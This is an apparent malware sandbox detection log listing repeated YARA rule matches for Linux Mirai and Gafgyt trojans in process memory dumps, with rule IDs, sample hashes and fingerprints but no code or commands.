Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6592.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6600.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6529.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6500.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6606.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6559.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
